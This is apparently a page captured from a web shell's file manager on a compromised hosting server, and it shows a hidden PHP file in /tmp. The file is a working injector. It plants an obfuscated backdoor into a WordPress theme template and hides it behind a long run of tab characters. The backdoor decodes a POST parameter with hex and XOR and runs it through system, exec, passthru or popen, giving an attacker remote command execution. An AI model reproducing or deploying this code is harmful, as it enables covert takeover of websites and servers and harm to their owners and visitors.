HEX
Server: Apache
System: Linux br512.hostgator.com.br 5.14.0-162.23.1.9991722448259.nf.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 31 18:11:45 UTC 2024 x86_64
User: stiliz28 (2548)
PHP: 8.3.30
Disabled: NONE
Upload Files
File: //tmp/.db2_convert
<?php  $path = '/home1/tabela11/public_html/wp-content/themes/darknews/template-parts/content.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('%24event_handler1%20%3D%20%22s%5Cx79s%5Cx74%5Cx65m%22%3B%20%24event_handler6%20%3D%20%22%5Cx73tr%5Cx65%5Cx61%5Cx6D_g%5Cx65t%5Cx5F%5Cx63%5Cx6F%5Cx6E%5Cx74ents%22%3B%20%24event_handler5%20%3D%20%22p%5Cx6Fpen%22%3B%20%24event_handler7%20%3D%20%22pc%5Cx6Cose%22%3B%20%24event_handler2%20%3D%20%22shel%5Cx6C%5Cx5Fe%5Cx78e%5Cx63%22%3B%20%24data_storage%20%3D%20%22hex%5Cx32%5Cx62%5Cx69n%22%3B%20%24event_handler3%20%3D%20%22%5Cx65x%5Cx65c%22%3B%20%24event_handler4%20%3D%20%22%5Cx70%5Cx61ss%5Cx74hr%5Cx75%22%3B%20if%20%28isset%28%24_POST%5B%22r%5Cx65c%22%5D%29%29%20%7B%20function%20config_manager%20%28%20%24resource%20%2C%20%24sym%29%7B%20%24component%20%3D%20%27%27%20%3B%20foreach%28str_split%28%24resource%29%20as%20%24char%29%7B%20%24component.%3Dchr%28ord%28%24char%29%5E%24sym%29%3B%20%7D%20return%24component%3B%20%7D%20%24rec%20%3D%20%24data_storage%28%24_POST%5B%22r%5Cx65c%22%5D%29%3B%20%24rec%20%3D%20config_manager%28%24rec%2C%2088%29%3B%20if%20%28function_exists%28%24event_handler1%29%29%20%7B%20%24event_handler1%28%24rec%29%3B%20%7D%20elseif%20%28function_exists%28%24event_handler2%29%29%20%7B%20print%20%24event_handler2%28%24rec%29%3B%20%7D%20elseif%20%28function_exists%28%24event_handler3%29%29%20%7B%20%24event_handler3%28%24rec%2C%20%24key_resource%29%3B%20print%20join%28%22%5Cn%22%2C%20%24key_resource%29%3B%20%7D%20elseif%20%28function_exists%28%24event_handler4%29%29%20%7B%20%24event_handler4%28%24rec%29%3B%20%7D%20elseif%20%28function_exists%28%24event_handler5%29%20%26%26%20function_exists%28%24event_handler6%29%20%26%26%20function_exists%28%24event_handler7%29%29%20%7B%20%24sym_component%20%3D%20%24event_handler5%28%24rec%2C%20%27r%27%29%3B%20if%20%28%24sym_component%29%20%7B%20%24entity_flag%20%3D%20%24event_handler6%28%24sym_component%29%3B%20%24event_handler7%28%24sym_component%29%3B%20print%20%24entity_flag%3B%20%7D%20%7D%20exit%3B%20%7D'); if (strstr($content, $new_code)) {     die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) {     if (substr($content, 0, strlen($start)) == $start) {         $content = substr($content, strlen($start));         $content = $start.str_repeat("\t", 42).$new_code."\n".$content;         if (file_put_contents($path, $content)) {             $content = file_get_contents($path);             if (strstr($content, $new_code)) {                 die("!success!<ft>{$ft}</ft>");             }         }     } } die('!failed!');